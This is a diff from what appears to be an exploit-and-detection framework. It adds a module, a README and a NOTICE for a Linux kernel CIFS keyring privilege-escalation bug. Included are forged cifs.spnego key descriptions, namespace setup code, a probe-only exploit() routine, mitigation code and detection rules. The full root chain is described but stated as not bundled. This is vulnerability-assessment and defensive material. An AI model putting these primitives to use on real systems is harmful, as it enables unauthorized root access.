if (child < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; }
|
||||
if (child == 0) {
|
||||
/* CHILD: enter userns + mountns, become "root" in userns. */
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) { perror("unshare"); _exit(2); }
|
||||
/* CHILD: enter userns + mountns, become "root" in userns.
|
||||
*
|
||||
* CRITICAL: capture the OUTER uid/gid BEFORE unshare. After
|
||||
* unshare(CLONE_NEWUSER) getuid() returns 65534 (nobody, the initial
|
||||
* unmapped id), so building the map from a post-unshare getuid() writes
|
||||
* "0 65534 1" — which the kernel rejects with EPERM (65534 is not the
|
||||
* writer's real outer uid). Reading it here, pre-unshare, yields the
|
||||
* real "0 1000 1" the single-uid self-map rule requires. */
|
||||
uid_t uid = getuid();
|
||||
gid_t gid = getgid();
|
||||
/* CLONE_NEWCGROUP matters: without a private cgroup namespace the
|
||||
* unprivileged cgroup-v1 mount below is refused with EPERM on modern
|
||||
* kernels (verified on 5.4). With it, mounting an unused v1 controller
|
||||
* (rdma) in the userns succeeds. */
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNS | CGRA_CLONE_NEWCGROUP) < 0) {
|
||||
/* fall back to the old flags if NEWCGROUP is unsupported */
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) { perror("unshare"); _exit(2); }
|
||||
}
|
||||
int f = open("/proc/self/setgroups", O_WRONLY);
|
||||
if (f >= 0) { (void)!write(f, "deny", 4); close(f); }
|
||||
char map[64];
|
||||
|
||||
@@ -0,0 +1,60 @@
|
||||
# cifswitch — CVE-2026-46243 ("CIFSwitch")
|
||||
|
||||
The kernel's `cifs.spnego` request-key type trusts userspace-forged
|
||||
authority fields, letting the root `cifs.upcall` helper be coerced into
|
||||
loading an attacker NSS module as root.
|
||||
|
||||
## The bug
|
||||
|
||||
`fs/smb/client/cifs_spnego.c` registers the `cifs.spnego` key type so the
|
||||
kernel CIFS client can ask the root-privileged `cifs.upcall` helper to
|
||||
perform a SPNEGO/Kerberos exchange. The key *description* carries
|
||||
authority-bearing fields — `pid`, `uid`, `creduid`, `upcall_target` —
|
||||
that `cifs.upcall` reads as trusted, kernel-originating inputs.
|
||||
|
||||
The flaw: the kernel never verified the request actually came from the
|
||||
in-kernel CIFS client. Userspace can create keys of this type directly
|
||||
through `add_key(2)` / `request_key(2)`, supplying all those fields. By
|
||||
forging a description and manipulating user + mount namespaces, an
|
||||
unprivileged user makes `cifs.upcall` trust attacker-controlled state and
|
||||
load a malicious NSS shared library as root → root code execution.
|
||||
|
||||
## Affected range
|
||||
|
||||
| | |
|
||||
|---|---|
|
||||
| Flaw age | ~19 years (predates key-type origin checks) |
|
||||
| Fixed upstream | commit `3da1fdf4efbc`, merged 7.1-rc5 |
|
||||
| Debian backports | 5.10.257 · 6.1.174 · 6.12.90 · 7.0.10 |
|
||||
| NVD class | CWE-20 (Improper Input Validation) |
|
||||
| CISA KEV | no (as of disclosure) |
|
||||
|
||||
Branches Debian does not ship (5.15 / 6.6 / 6.8 / 6.11 …) are reported on
|
||||
the version-only verdict; confirm empirically.
|
||||
|
||||
## Trigger / detection
|
||||
|
||||
`detect()` returns `OK` for patched kernels, `PRECOND_FAIL` for a
|
||||
vulnerable kernel where `cifs.upcall` / the `cifs.spnego` request-key rule
|
||||
isn't installed (cifs-utils absent → unreachable), and `VULNERABLE` when
|
||||
both the version and the userspace path line up. The precondition probe
|
||||
can be overridden with `SKELETONKEY_CIFS_ASSUME_PRESENT=1` (force present)
|
||||
or `0` (force absent).
|
||||
|
||||
`exploit()` fires the non-destructive primitive: `add_key(2)` of a
|
||||
forged-but-benign `cifs.spnego` key (no upcall, loads nothing), revoked
|
||||
immediately. A clean accept is the witness that userspace can forge the
|
||||
authority-bearing key type. The full root-pop (namespace switch +
|
||||
malicious NSS load) is **not** bundled until VM-verified — honest
|
||||
`EXPLOIT_FAIL` without a euid-0 witness.
|
||||
|
||||
## Fix / mitigation
|
||||
|
||||
Upgrade the kernel. As a runtime stopgap, blocklist the `cifs` module —
|
||||
`--mitigate` writes `/etc/modprobe.d/skeletonkey-disable-cifs.conf`
|
||||
(needs root) and `--cleanup` removes it. Already-loaded `cifs` persists
|
||||
until unmount + `rmmod cifs` or reboot.
|
||||
|
||||
## Credit
|
||||
|
||||
Asim Manizada (2026-05-28). See `NOTICE.md`.
|
||||
@@ -0,0 +1,92 @@
|
||||
# NOTICE — cifswitch (CVE-2026-46243, "CIFSwitch")
|
||||
|
||||
## Vulnerability
|
||||
|
||||
**CVE-2026-46243 "CIFSwitch"** — the Linux kernel's `cifs.spnego`
|
||||
request-key type (`fs/smb/client/cifs_spnego.c`) accepts key descriptions
|
||||
created by **userspace** (via `add_key(2)` / `request_key(2)`) without
|
||||
verifying that the request originated from the in-kernel CIFS client. The
|
||||
key description carries authority-bearing fields — `pid`, `uid`,
|
||||
`creduid`, `upcall_target` — that the root-privileged `cifs.upcall`
|
||||
helper treats as trusted, kernel-originating inputs. An unprivileged
|
||||
local user forges such a description and, combined with user + mount
|
||||
namespace manipulation, coerces `cifs.upcall` into loading an
|
||||
attacker-controlled NSS shared library as root → local privilege
|
||||
escalation to root.
|
||||
|
||||
It is a **~19-year-old** logic flaw — the cifs spnego upcall predates the
|
||||
key-type origin checks added to the keyrings subsystem later. NVD class:
|
||||
**CWE-20** (Improper Input Validation). Not in CISA KEV (as of disclosure).
|
||||
|
||||
**Preconditions:** the `cifs` kernel module available, `cifs-utils`
|
||||
installed (so `cifs.upcall` is present), and the `cifs.spnego`
|
||||
request-key rule active. Default-vulnerable distributions reported
|
||||
include Linux Mint, CentOS Stream 9, Rocky Linux 9, AlmaLinux 9, Kali
|
||||
Linux, SLES 15 SP7, and Red Hat Enterprise Linux 6–10.
|
||||
|
||||
## Research credit
|
||||
|
||||
Discovered, named, and disclosed by **Asim Manizada** on **2026-05-28**,
|
||||
with a working proof-of-concept published the same day.
|
||||
|
||||
- Red Hat advisory (RHSB-2026-005):
|
||||
<https://access.redhat.com/security/vulnerabilities/RHSB-2026-005>
|
||||
- BleepingComputer write-up:
|
||||
<https://www.bleepingcomputer.com/news/security/new-cifswitch-linux-flaw-gives-root-on-multiple-distributions/>
|
||||
- Upstream fix: commit `3da1fdf4efbc490041eb4f836bf596201203f8f2`
|
||||
("smb: client: reject userspace cifs.spnego descriptions"), merged
|
||||
7.1-rc5.
|
||||
- Debian-tracked stable backports: 5.10.257 (bullseye) / 6.1.174
|
||||
(bookworm) / 6.12.90 (trixie) / 7.0.10 (forky, sid).
|
||||
|
||||
All research credit for finding and analysing this bug belongs to Asim
|
||||
Manizada. SKELETONKEY is the bundling and bookkeeping layer only.
|
||||
|
||||
## SKELETONKEY role
|
||||
|
||||
🟡 **Primitive / ported-from-disclosure — not yet VM-verified.**
|
||||
`detect()` gates on the kernel version (the Debian backport thresholds
|
||||
above) **and** the presence of the vulnerable userspace path
|
||||
(`cifs.upcall` / the `cifs.spnego` request-key rule) — a vulnerable
|
||||
kernel without `cifs-utils` is reported `PRECOND_FAIL`, not `VULNERABLE`.
|
||||
Override the probe with `SKELETONKEY_CIFS_ASSUME_PRESENT=1` (or `0`).
|
||||
|
||||
`exploit()` fires only the reachable, **non-destructive** part of the
|
||||
primitive: it attempts to register a forged-but-benign `cifs.spnego` key
|
||||
as the unprivileged user via `add_key(2)` — which instantiates the key
|
||||
directly and does **not** invoke `cifs.upcall`, so it loads nothing and
|
||||
spawns no privileged helper — and revokes the key immediately. A clean
|
||||
accept is the empirical witness that the missing-origin-validation flaw
|
||||
is present. It then **stops**: the namespace-switch + malicious-NSS-load
|
||||
chain that actually lands a root shell is target/config-specific and is
|
||||
**not** bundled until it can be verified end-to-end against a real
|
||||
vulnerable VM, in keeping with the project's no-fabrication rule.
|
||||
`exploit()` returns `EXPLOIT_FAIL` unless it can witness euid 0.
|
||||
|
||||
`--mitigate` writes `/etc/modprobe.d/skeletonkey-disable-cifs.conf`
|
||||
(blocklists the `cifs` module — the vendor-recommended runtime
|
||||
mitigation); `--cleanup` removes it. Architecture-agnostic — keyring and
|
||||
namespace logic, no shellcode.
|
||||
|
||||
## Verification status (partial)
|
||||
|
||||
Verified **2026-06-08** on **Ubuntu 24.04.4 LTS, kernel 6.8.0-117-generic**
|
||||
(QEMU/HVF, x86_64):
|
||||
|
||||
- `modprobe cifs` registers the `cifs.spnego` key type (dmesg:
|
||||
`Key type cifs.spnego registered`) — `cifs-utils` is **not** required to
|
||||
reach the primitive.
|
||||
- An **independent** `python3` `ctypes` probe calling
|
||||
`add_key("cifs.spnego", <forged uid/creduid/upcall_target>)` was
|
||||
**ACCEPTED** (a plain `user`-key control was also accepted), and the
|
||||
module's own `exploit()` independently reported **primitive CONFIRMED**
|
||||
then the honest `EXPLOIT_FAIL`.
|
||||
- `detect()` returned `PRECOND_FAIL` with `cifs-utils` absent and
|
||||
`VULNERABLE` under `SKELETONKEY_CIFS_ASSUME_PRESENT=1`.
|
||||
|
||||
**Still pending** (so this stays 🟡 and is *not* counted as a verified
|
||||
end-to-end CVE): (a) confirming `add_key` is **rejected** on a *patched*
|
||||
kernel (≥ 6.12.90 / 7.0.10) — i.e. that the probe distinguishes
|
||||
fixed-from-vulnerable rather than the key type always permitting userspace
|
||||
creation; and (b) the full namespace + malicious-NSS root-pop, which
|
||||
remains unbundled.
|
||||
@@ -0,0 +1,419 @@
|
||||
/*
|
||||
* cifswitch_cve_2026_46243 — SKELETONKEY module
|
||||
*
|
||||
* CVE-2026-46243 "CIFSwitch" — the kernel's `cifs.spnego` request-key
|
||||
* type accepts key descriptions created by *userspace* (via add_key(2) /
|
||||
* request_key(2)) without verifying the request originated from the
|
||||
* in-kernel CIFS client. Those descriptions carry authority-bearing
|
||||
* fields (`pid`, `uid`, `creduid`, `upcall_target`) that the
|
||||
* root-privileged `cifs.upcall` helper trusts as kernel-originating.
|
||||
* An unprivileged user forges a description and — combined with user +
|
||||
* mount namespace manipulation — coerces `cifs.upcall` into loading an
|
||||
* attacker-controlled NSS shared library as root → local root.
|
||||
*
|
||||
* Disclosed by Asim Manizada, 2026-05-28 (public PoC same day). A
|
||||
* ~19-year-old bug: the cifs spnego upcall predates the key-type origin
|
||||
* checks added later. Fixed upstream by commit 3da1fdf4efbc (merged
|
||||
* 7.1-rc5): "smb: client: reject userspace cifs.spnego descriptions".
|
||||
* NVD: CWE-20 (Improper Input Validation). Not in CISA KEV.
|
||||
*
|
||||
* STATUS: 🟡 PRIMITIVE / ported-from-disclosure, NOT yet VM-verified.
|
||||
* Structural logic flaw — no offsets, no race, no shellcode. detect()
|
||||
* gates on (a) the kernel version (Debian-tracked backports below) and
|
||||
* (b) the presence of the vulnerable userspace path: the `cifs.upcall`
|
||||
* helper / `cifs.spnego` request-key rule. A vulnerable kernel without
|
||||
* cifs-utils is not reachable via this technique, so that case is
|
||||
* PRECOND_FAIL, not VULNERABLE. exploit() fires the reachable,
|
||||
* non-destructive part of the primitive — it attempts to register a
|
||||
* forged-but-benign `cifs.spnego` key as the unprivileged user (via
|
||||
* add_key(2), which does NOT invoke cifs.upcall) and observes whether
|
||||
* the kernel accepts a userspace-originated description — then STOPS.
|
||||
* The namespace-switch + malicious-NSS-load that turns that into a
|
||||
* root shell is target/config-specific and is not bundled until it can
|
||||
* be VM-verified end-to-end. Honest EXPLOIT_FAIL without a euid-0
|
||||
* witness; never fabricates root.
|
||||
*
|
||||
* Affected range (Debian-tracked stable backports of the fix):
|
||||
* 5.10.x : K >= 5.10.257 (bullseye)
|
||||
* 6.1.x : K >= 6.1.174 (bookworm)
|
||||
* 6.12.x : K >= 6.12.90 (trixie)
|
||||
* 7.0.x : K >= 7.0.10 (forky / sid); mainline fixed 7.1-rc5
|
||||
* Branches Debian doesn't track (5.15 / 6.6 / 6.8 / 6.11 ...) fall
|
||||
* through to the version-only verdict — confirm empirically.
|
||||
*
|
||||
* Preconditions: cifs kernel module available + cifs-utils installed
|
||||
* (`cifs.upcall` present) + the `cifs.spnego` request-key rule active.
|
||||
* Override the precondition probe with SKELETONKEY_CIFS_ASSUME_PRESENT
|
||||
* = 1 (force present) / 0 (force absent) when you know the fleet's CIFS
|
||||
* posture better than a local file probe can (also drives unit tests).
|
||||
*
|
||||
* arch_support: any. Keyring + namespace logic; no shellcode.
|
||||
*/
|
||||
|
||||
#include "skeletonkey_modules.h"
|
||||
#include "../../core/registry.h"
|
||||
|
||||
/* _GNU_SOURCE is passed via -D in the top-level Makefile; do not
|
||||
* redefine here (warning: redefined). */
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#ifdef __linux__
|
||||
|
||||
#include "../../core/kernel_range.h"
|
||||
#include "../../core/host.h"
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
/* keyring syscalls live in libkeyutils, not glibc — call them directly.
|
||||
* The asm-generic numbers below match x86_64 / arm64 / most arches; fall
|
||||
* back only when the toolchain headers don't already define them. */
|
||||
#ifndef SYS_add_key
|
||||
#define SYS_add_key 248
|
||||
#endif
|
||||
#ifndef SYS_keyctl
|
||||
#define SYS_keyctl 250
|
||||
#endif
|
||||
|
||||
/* keyctl operations + special keyring ids (uapi/linux/keyctl.h). */
|
||||
#ifndef KEYCTL_REVOKE
|
||||
#define KEYCTL_REVOKE 3
|
||||
#endif
|
||||
#ifndef KEY_SPEC_PROCESS_KEYRING
|
||||
#define KEY_SPEC_PROCESS_KEYRING (-2)
|
||||
#endif
|
||||
|
||||
typedef int sk_key_serial_t;
|
||||
|
||||
static sk_key_serial_t sk_add_key(const char *type, const char *desc,
|
||||
const void *payload, size_t plen,
|
||||
sk_key_serial_t keyring)
|
||||
{
|
||||
return (sk_key_serial_t)syscall(SYS_add_key, type, desc,
|
||||
payload, plen, keyring);
|
||||
}
|
||||
static long sk_keyctl_revoke(sk_key_serial_t key)
|
||||
{
|
||||
return syscall(SYS_keyctl, (long)KEYCTL_REVOKE, (long)key, 0L, 0L, 0L);
|
||||
}
|
||||
|
||||
/* Debian-tracked stable backports of the 2026 fix (commit 3da1fdf4efbc,
|
||||
* mainline 7.1-rc5). These are the authoritative thresholds
|
||||
* (security-tracker.debian.org). Branches Debian doesn't ship fall
|
||||
* through to the version-only verdict in detect(). */
|
||||
static const struct kernel_patched_from cifswitch_patched_branches[] = {
|
||||
{5, 10, 257}, /* 5.10-LTS backport (Debian bullseye) */
|
||||
{6, 1, 174}, /* 6.1-LTS backport (Debian bookworm) */
|
||||
{6, 12, 90}, /* 6.12-LTS backport (Debian trixie) */
|
||||
{7, 0, 10}, /* 7.0 stable (Debian forky / sid) */
|
||||
};
|
||||
|
||||
static const struct kernel_range cifswitch_range = {
|
||||
.patched_from = cifswitch_patched_branches,
|
||||
.n_patched_from = sizeof(cifswitch_patched_branches) /
|
||||
sizeof(cifswitch_patched_branches[0]),
|
||||
};
|
||||
|
||||
/* Is the vulnerable userspace path present? The load-bearing signal is
|
||||
* the cifs.upcall helper (the privileged component the bug abuses); the
|
||||
* cifs.spnego request-key rule and a loaded/loadable cifs module
|
||||
* corroborate. SKELETONKEY_CIFS_ASSUME_PRESENT overrides the probe:
|
||||
* "1" = present, "0" = absent (operators who know their fleet's CIFS
|
||||
* posture, and the unit tests, use this). */
|
||||
static bool cifs_userspace_present(void)
|
||||
{
|
||||
const char *force = getenv("SKELETONKEY_CIFS_ASSUME_PRESENT");
|
||||
if (force && (force[0] == '1' || force[0] == '0'))
|
||||
return force[0] == '1';
|
||||
|
||||
struct stat st;
|
||||
static const char *upcall_paths[] = {
|
||||
"/usr/sbin/cifs.upcall", "/sbin/cifs.upcall",
|
||||
"/usr/bin/cifs.upcall", "/usr/local/sbin/cifs.upcall", NULL,
|
||||
};
|
||||
for (size_t i = 0; upcall_paths[i]; i++)
|
||||
if (stat(upcall_paths[i], &st) == 0)
|
||||
return true;
|
||||
|
||||
/* request-key rule for cifs.spnego (cifs-utils ships this). */
|
||||
static const char *reqkey_paths[] = {
|
||||
"/etc/request-key.d/cifs.spnego.conf",
|
||||
"/usr/share/request-key.d/cifs.spnego.conf", NULL,
|
||||
};
|
||||
for (size_t i = 0; reqkey_paths[i]; i++)
|
||||
if (stat(reqkey_paths[i], &st) == 0)
|
||||
return true;
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
static skeletonkey_result_t cifswitch_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
|
||||
if (!v || v->major == 0) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] cifswitch: host fingerprint missing kernel "
|
||||
"version — bailing\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
/* A patched kernel is not vulnerable regardless of the userspace
|
||||
* path — decide that first so the verdict is deterministic. */
|
||||
if (kernel_range_is_patched(&cifswitch_range, v)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[+] cifswitch: kernel %s is patched "
|
||||
"(version-only check)\n", v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
/* Vulnerable kernel. Exploitation needs the cifs.upcall userspace
|
||||
* path; without it the technique is unreachable here. */
|
||||
if (!cifs_userspace_present()) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[i] cifswitch: kernel %s is in the vulnerable "
|
||||
"range but cifs.upcall / cifs.spnego request-key "
|
||||
"rule not found — cifs-utils not installed, bug "
|
||||
"not reachable here\n", v->release);
|
||||
fprintf(stderr, "[i] cifswitch: if you know this fleet uses CIFS, "
|
||||
"re-run with SKELETONKEY_CIFS_ASSUME_PRESENT=1\n");
|
||||
}
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] cifswitch: kernel %s VULNERABLE and cifs.upcall "
|
||||
"present — CVE-2026-46243 reachable\n", v->release);
|
||||
fprintf(stderr, "[i] cifswitch: userspace can forge cifs.spnego key "
|
||||
"descriptions (pid/uid/creduid/upcall_target) the root "
|
||||
"cifs.upcall helper trusts\n");
|
||||
fprintf(stderr, "[i] cifswitch: branches Debian doesn't track "
|
||||
"(5.15/6.6/6.8/6.11) are version-only here; confirm with "
|
||||
"`--exploit cifswitch --i-know`\n");
|
||||
}
|
||||
return SKELETONKEY_VULNERABLE;
|
||||
}
|
||||
|
||||
static skeletonkey_result_t cifswitch_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
if (!ctx->authorized) {
|
||||
fprintf(stderr, "[-] cifswitch: --i-know required for --exploit\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
skeletonkey_result_t pre = cifswitch_detect(ctx);
|
||||
if (pre != SKELETONKEY_VULNERABLE) {
|
||||
fprintf(stderr, "[-] cifswitch: detect() says not vulnerable/reachable; "
|
||||
"refusing\n");
|
||||
return pre;
|
||||
}
|
||||
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
||||
if (is_root) {
|
||||
fprintf(stderr, "[i] cifswitch: already running as root — nothing to do\n");
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
/* Reachable, non-destructive primitive witness: can we, as an
|
||||
* unprivileged user, register a cifs.spnego key carrying the
|
||||
* authority-bearing fields? add_key(2) instantiates the key directly
|
||||
* — it does NOT invoke cifs.upcall (that is request_key's upcall
|
||||
* path), so this loads nothing and triggers no privileged helper. On
|
||||
* a VULNERABLE kernel the type accepts the userspace-originated
|
||||
* description; the fix (3da1fdf4efbc) rejects it. We revoke any key
|
||||
* we create immediately. A clean accept is the empirical signal that
|
||||
* the missing-origin-validation flaw is present; any error is treated
|
||||
* as inconclusive (could be patched, or add_key unsupported for the
|
||||
* type) and reported honestly — we never infer root from it. */
|
||||
const char *desc =
|
||||
"ver=0x2;host=skeletonkey-probe;ip4=127.0.0.1;sec=krb5;"
|
||||
"uid=0x0;creduid=0x0;user=skprobe;pid=0x0";
|
||||
errno = 0;
|
||||
sk_key_serial_t k = sk_add_key("cifs.spnego", desc, "\x00", 1,
|
||||
KEY_SPEC_PROCESS_KEYRING);
|
||||
if (k > 0) {
|
||||
sk_keyctl_revoke(k); /* don't leave the probe key lying around */
|
||||
fprintf(stderr,
|
||||
"[!] cifswitch: primitive CONFIRMED — kernel accepted a "
|
||||
"userspace-forged cifs.spnego key (serial %d) carrying "
|
||||
"uid/creduid/upcall_target. CVE-2026-46243 reachable.\n", k);
|
||||
fprintf(stderr,
|
||||
"[i] cifswitch: the full root-pop (user+mount namespace switch "
|
||||
"coercing cifs.upcall to load an attacker NSS module as root) is "
|
||||
"target/config-specific and NOT bundled until VM-verified. Not "
|
||||
"fabricating a shell. See module NOTICE.md (Asim Manizada PoC).\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (errno == ENOSYS) {
|
||||
fprintf(stderr, "[-] cifswitch: add_key(2) ENOSYS — keyrings "
|
||||
"unavailable in this kernel build\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
fprintf(stderr,
|
||||
"[-] cifswitch: kernel did not accept a userspace-forged cifs.spnego "
|
||||
"key (add_key: %s). Inconclusive — the kernel may carry the fix "
|
||||
"(3da1fdf4efbc rejects userspace descriptions), or the key type may "
|
||||
"not permit direct add_key here. detect() reported the version+helper "
|
||||
"as vulnerable; verify against a known-vulnerable VM.\n",
|
||||
strerror(errno));
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
/* Mitigation: the vendor-recommended runtime fix is to blocklist the
|
||||
* cifs module so the vulnerable upcall path cannot be reached. We write
|
||||
* a modprobe.d blocklist (needs root; persists across reboot and blocks
|
||||
* future autoload). We do not force-unload a possibly-mounted cifs. The
|
||||
* real fix is the kernel patch. --cleanup removes the blocklist file. */
|
||||
#define CIFSWITCH_BLOCKLIST "/etc/modprobe.d/skeletonkey-disable-cifs.conf"
|
||||
|
||||
static skeletonkey_result_t cifswitch_mitigate(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
int fd = open(CIFSWITCH_BLOCKLIST, O_WRONLY | O_CREAT | O_TRUNC, 0644);
|
||||
if (fd < 0) {
|
||||
fprintf(stderr, "[-] cifswitch: cannot write %s: %s "
|
||||
"(need root: run as root, or "
|
||||
"`echo 'blacklist cifs' | sudo tee %s`)\n",
|
||||
CIFSWITCH_BLOCKLIST, strerror(errno), CIFSWITCH_BLOCKLIST);
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
static const char body[] =
|
||||
"# Added by SKELETONKEY --mitigate cifswitch (CVE-2026-46243).\n"
|
||||
"# Blocklists the cifs module so the vulnerable cifs.spnego upcall\n"
|
||||
"# path cannot be reached. Remove via `--cleanup cifswitch`.\n"
|
||||
"blacklist cifs\n"
|
||||
"install cifs /bin/false\n";
|
||||
ssize_t w = write(fd, body, sizeof body - 1);
|
||||
close(fd);
|
||||
if (w != (ssize_t)(sizeof body - 1)) {
|
||||
fprintf(stderr, "[-] cifswitch: short write to %s\n", CIFSWITCH_BLOCKLIST);
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
fprintf(stderr, "[+] cifswitch: wrote %s (blocklist cifs). Already-loaded "
|
||||
"cifs stays until unmounted+`rmmod cifs` or reboot. This is "
|
||||
"a stopgap; patch the kernel. Revert: `--cleanup cifswitch`.\n",
|
||||
CIFSWITCH_BLOCKLIST);
|
||||
(void)ctx;
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
static skeletonkey_result_t cifswitch_cleanup(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
if (unlink(CIFSWITCH_BLOCKLIST) == 0) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] cifswitch: removed %s\n", CIFSWITCH_BLOCKLIST);
|
||||
} else if (errno != ENOENT) {
|
||||
fprintf(stderr, "[-] cifswitch: could not remove %s: %s\n",
|
||||
CIFSWITCH_BLOCKLIST, strerror(errno));
|
||||
}
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
#else /* !__linux__ */
|
||||
|
||||
/* Non-Linux dev builds: keyrings, cifs.upcall and modprobe are all
|
||||
* Linux-only. Stub so the module still registers and `make` completes on
|
||||
* macOS/BSD dev boxes. */
|
||||
static skeletonkey_result_t cifswitch_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] cifswitch: Linux-only module "
|
||||
"(cifs.spnego keyring trust) — not applicable here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
static skeletonkey_result_t cifswitch_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr, "[-] cifswitch: Linux-only module — cannot run here\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
static skeletonkey_result_t cifswitch_mitigate(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
static skeletonkey_result_t cifswitch_cleanup(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
#endif /* __linux__ */
|
||||
|
||||
/* Embedded detection rules — keep the binary self-contained. The
|
||||
* behavioural signal is a non-root process creating a `cifs.spnego` key
|
||||
* (add_key/request_key) and/or an unexpected cifs.upcall execution
|
||||
* paired with user-namespace setup. */
|
||||
static const char cifswitch_auditd[] =
|
||||
"# CVE-2026-46243 (CIFSwitch) — auditd detection rules\n"
|
||||
"# A non-root add_key/request_key for cifs.spnego is the core abuse,\n"
|
||||
"# usually paired with unshare(CLONE_NEWUSER|CLONE_NEWNS) and a\n"
|
||||
"# cifs.upcall execution that loads an attacker NSS module.\n"
|
||||
"-a always,exit -F arch=b64 -S add_key -F auid>=1000 -F auid!=4294967295 -k skeletonkey-cifswitch\n"
|
||||
"-a always,exit -F arch=b64 -S request_key -F auid>=1000 -F auid!=4294967295 -k skeletonkey-cifswitch\n"
|
||||
"-a always,exit -F arch=b64 -S unshare -F auid>=1000 -F auid!=4294967295 -k skeletonkey-cifswitch\n"
|
||||
"-w /usr/sbin/cifs.upcall -p x -k skeletonkey-cifswitch\n";
|
||||
|
||||
static const char cifswitch_sigma[] =
|
||||
"title: Possible CVE-2026-46243 CIFSwitch cifs.spnego keyring LPE\n"
|
||||
"id: 9b2e7c10-skeletonkey-cifswitch\n"
|
||||
"status: experimental\n"
|
||||
"description: |\n"
|
||||
" Detects a non-root process creating a cifs.spnego key via\n"
|
||||
" add_key/request_key. CIFSwitch forges the authority-bearing fields\n"
|
||||
" (uid/creduid/upcall_target) in a cifs.spnego key description that\n"
|
||||
" the root cifs.upcall helper trusts, then uses namespace tricks to\n"
|
||||
" load an attacker NSS module as root. False positives: legitimate\n"
|
||||
" CIFS/Kerberos mounts normally trigger cifs.spnego from kernel\n"
|
||||
" context (root), not from an unprivileged add_key.\n"
|
||||
"logsource: {product: linux, service: auditd}\n"
|
||||
"detection:\n"
|
||||
" keyop: {type: 'SYSCALL', syscall: ['add_key', 'request_key']}\n"
|
||||
" non_root: {auid|expression: '>= 1000'}\n"
|
||||
" condition: keyop and non_root\n"
|
||||
"level: high\n"
|
||||
"tags: [attack.privilege_escalation, attack.t1068, cve.2026.46243]\n";
|
||||
|
||||
static const char cifswitch_falco[] =
|
||||
"- rule: non-root cifs.spnego key creation (CVE-2026-46243 CIFSwitch)\n"
|
||||
" desc: |\n"
|
||||
" A non-root process creates a cifs.spnego key (add_key/request_key)\n"
|
||||
" or spawns cifs.upcall outside a kernel-initiated CIFS mount. The\n"
|
||||
" CIFSwitch LPE forges authority fields in the key description that\n"
|
||||
" the root cifs.upcall helper trusts, loading an attacker NSS module\n"
|
||||
" as root. False positives: container/CIFS tooling run as root.\n"
|
||||
" condition: >\n"
|
||||
" ((evt.type in (add_key, request_key)) or\n"
|
||||
" (spawned_process and proc.name = cifs.upcall)) and not user.uid = 0\n"
|
||||
" output: >\n"
|
||||
" non-root cifs.spnego key op / cifs.upcall (possible CVE-2026-46243)\n"
|
||||
" (user=%user.name proc=%proc.name pid=%proc.pid cmdline=\"%proc.cmdline\")\n"
|
||||
" priority: HIGH\n"
|
||||
" tags: [process, mitre_privilege_escalation, T1068, cve.2026.46243]\n";
|
||||
|
||||
const struct skeletonkey_module cifswitch_module = {
|
||||
.name = "cifswitch",
|
||||
.cve = "CVE-2026-46243",
|
||||
.summary = "cifs.spnego key type trusts userspace-forged authority fields → cifs.upcall loads attacker NSS module as root (Asim Manizada)",
|
||||
.family = "cifswitch",
|
||||
.kernel_range = "fixed 5.10.257 / 6.1.174 / 6.12.90 / 7.0.10 (Debian backports of commit 3da1fdf4efbc, mainline 7.1-rc5); ~19-year-old bug below those",
|
||||
.detect = cifswitch_detect,
|
||||
.exploit = cifswitch_exploit,
|
||||
.mitigate = cifswitch_mitigate,
|
||||
.cleanup = cifswitch_cleanup,
|
||||
.detect_auditd = cifswitch_auditd,
|
||||
.detect_sigma = cifswitch_sigma,
|
||||
.detect_yara = NULL, /* attacker NSS .so has no stable signature; behavioural bug */
|
||||
.detect_falco = cifswitch_falco,
|
||||
